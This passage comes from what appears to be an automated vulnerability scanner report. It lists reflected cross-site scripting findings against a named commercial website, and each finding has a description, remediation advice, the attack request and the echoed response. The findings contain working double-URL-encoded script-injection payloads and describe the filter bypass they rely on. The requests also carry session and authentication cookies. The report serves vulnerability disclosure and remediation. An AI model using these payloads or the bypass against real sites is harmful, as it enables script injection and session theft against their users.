Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:09 GMT
Content-Length: 28974
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science/sigma-transgenics75418";alert(1)//03a73ef7977","E404") ;
   </script>
...[SNIP]...

1.126. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7714e%2522%253balert%25281%2529%252f%252f236e942502 was submitted in the REST URL parameter 1. This input was echoed as 7714e";alert(1)//236e942502 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content7714e%2522%253balert%25281%2529%252f%252f236e942502/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:54 GMT
Content-Length: 28998
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content7714e";alert(1)//236e942502/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn","E404") ;
   </script>
...[SNIP]...

1.127. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b33a1%2522%253balert%25281%2529%252f%252f8c3c0427d0e was submitted in the REST URL parameter 2. This input was echoed as b33a1";alert(1)//8c3c0427d0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrichb33a1%2522%253balert%25281%2529%252f%252f8c3c0427d0e/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:57 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrichb33a1";alert(1)//8c3c0427d0e/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn","E404") ;
   </script>
...[SNIP]...

1.128. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c6d1%2522%253balert%25281%2529%252f%252fc5eabbb08ea was submitted in the REST URL parameter 3. This input was echoed as 1c6d1";alert(1)//c5eabbb08ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest1c6d1%2522%253balert%25281%2529%252f%252fc5eabbb08ea/life-science/zinc-finger-nuclease-technology/custom-zfn HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:58 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest1c6d1";alert(1)//c5eabbb08ea/life-science/zinc-finger-nuclease-technology/custom-zfn","E404") ;
   </script>
...[SNIP]...

1.129. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 648e3%2522%253balert%25281%2529%252f%252f8a4b807a60d was submitted in the REST URL parameter 4. This input was echoed as 648e3";alert(1)//8a4b807a60d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science648e3%2522%253balert%25281%2529%252f%252f8a4b807a60d/zinc-finger-nuclease-technology/custom-zfn HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:00 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science648e3";alert(1)//8a4b807a60d/zinc-finger-nuclease-technology/custom-zfn","E404") ;
   </script>
...[SNIP]...

1.130. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 538c5%2522%253balert%25281%2529%252f%252f9501d1dbcc8 was submitted in the REST URL parameter 5. This input was echoed as 538c5";alert(1)//9501d1dbcc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology538c5%2522%253balert%25281%2529%252f%252f9501d1dbcc8/custom-zfn HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
